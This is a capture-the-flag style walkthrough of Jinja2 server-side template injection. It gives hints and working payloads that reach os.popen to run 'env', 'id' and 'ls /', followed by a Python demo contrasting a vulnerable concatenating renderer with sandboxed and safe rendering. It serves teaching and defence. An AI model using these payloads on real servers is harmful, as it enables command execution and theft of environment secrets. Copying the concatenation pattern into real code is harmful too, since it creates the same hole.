Jinja2

Basic server side template injection (SSTI) - Python Jinja2


Use the knowledge from the training module jinja2 to read the flag located in the system environment.

Hints

Hint #1

Remember: if you find the __import__ exception, it is likely that you can import a Python library that you need to run system commands!

Hint #2

System environment variables can be accessed with the system command env.

Solution

Payload:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('env').read() }}

Other system commands:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls /').read() }}
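The same attribute chain rendered three ways, as an added example that is not part of the challenge or the training module: through the vulnerable pattern that concatenates user input into the template source, through Jinja2's SandboxedEnvironment, and with the input passed as a context variable instead. It assumes the jinja2 package is installed and stops the chain at __import__ rather than calling popen().

```python
# Added example (not from the challenge page): why the Jinja2 payload works
# and what actually stops it. Assumes the `jinja2` package is installed.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Probe stops at __import__: enough to prove the chain resolves to the
# builtins without executing any command.
PROBE = "{{ self.__init__.__globals__.__builtins__.__import__ }}"


def render_vulnerable(user_input: str) -> str:
    """Anti-pattern: user input becomes part of the template SOURCE,
    so Jinja2 evaluates it as template code (the SSTI root cause)."""
    env = Environment()
    return env.from_string("Hello " + user_input).render()


def render_sandboxed(user_input: str) -> str:
    """Same concatenation, but SandboxedEnvironment refuses attribute
    names starting with '_' and raises SecurityError when they are used."""
    env = SandboxedEnvironment()
    return env.from_string("Hello " + user_input).render()


def render_safe(user_input: str) -> str:
    """Correct pattern: the template source is fixed; user input is data
    passed through the render context, so it is printed, not evaluated."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_input)


def probe_results() -> dict:
    """Run the probe through all three renderers and report the outcome."""
    out = {"vulnerable": render_vulnerable(PROBE)}
    try:
        render_sandboxed(PROBE)
        out["sandboxed"] = "rendered"
    except SecurityError as exc:
        out["sandboxed"] = f"SecurityError: {exc}"
    out["safe"] = render_safe(PROBE)
    return out


if __name__ == "__main__":
    for mode, result in probe_results().items():
        print(f"{mode:>10}: {result}")
```

The vulnerable renderer prints the built-in __import__ function, which is the signal Hint #1 tells you to look for; the sandbox aborts on the first underscore attribute, and the context-variable version echoes the probe back as plain text.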